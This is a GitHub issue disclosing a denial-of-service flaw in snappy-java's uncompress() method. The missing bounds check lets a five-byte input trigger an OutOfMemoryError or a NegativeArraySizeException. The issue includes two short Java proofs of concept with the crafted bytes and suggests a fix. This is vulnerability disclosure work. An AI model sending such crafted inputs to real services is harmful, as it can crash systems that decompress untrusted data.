Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Missing bound check on uncompress() in snappy-java can lead to Denial of Service (DoS) impact #625

Open
c2an1 opened this issue Dec 23, 2024 · 0 comments
Open

Missing bound check on uncompress() in snappy-java can lead to Denial of Service (DoS) impact #625

c2an1 opened this issue Dec 23, 2024 · 0 comments

Comments

@c2an1
Copy link

c2an1 commented Dec 23, 2024

Description

The uncompress() method in snappy-java lacks proper validation of the uncompressedLength, which leads to a potential Denial of Service (DoS) vulnerability. Specifically, with only 5 bytes of input, the library becomes vulnerable to DoS attacks.

Details

In the Snappy.java, the uncompress() method is implemented as follows:

public static byte[] uncompress(byte[] input) throws IOException {
    byte[] result = new byte[Snappy.uncompressedLength(input)];
    Snappy.uncompress(input, 0, input.length, result, 0);
    return result;
}

When creating the new byte[] array, there is no upper bounds check on the uncompressedLength. As a result, if uncompressedLength is too large, it can lead to an OutOfMemoryError, similar to the vulnerability of snappy-java described in GHSA-55g7-9cwv-5qfv (GitHub advisory).

Proof of Concept (PoC) 1

import org.xerial.snappy.Snappy;

public class PoC1 {
    public static void main(String[] args) {
        byte[] data = new byte[] { (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0x07 };
        try {
            byte[] uncompressedData = Snappy.uncompress(data);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

This will produce the following exception:
java.lang.OutOfMemoryError

Similarly, as seen in GHSA-pqr6-cmr2-h8hf (GitHub advisory), the absence of lower bounds checks on uncompressedLength can lead to a NegativeArraySizeException due to integer overflow.

Proof of Concept (PoC) 2

import org.xerial.snappy.Snappy;

public class PoC2 {
    public static void main(String[] args) {
        byte[] data = new byte[] { (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0x08 };
        try {
            byte[] uncompressedData = Snappy.uncompress(data);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

This will produce the following exception:
java.lang.NegativeArraySizeException

Impact
Denial of Service (DoS).

Mitigation
To resolve this issue, we suggest adding bounds validation in the uncompress() method before allocating the array. Specifically, ensure that Snappy.uncompressedLength(input) is greater than 0 and below a reasonable upper limit, similar to the fix applied in GHSA-55g7-9cwv-5qfv.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@c2an1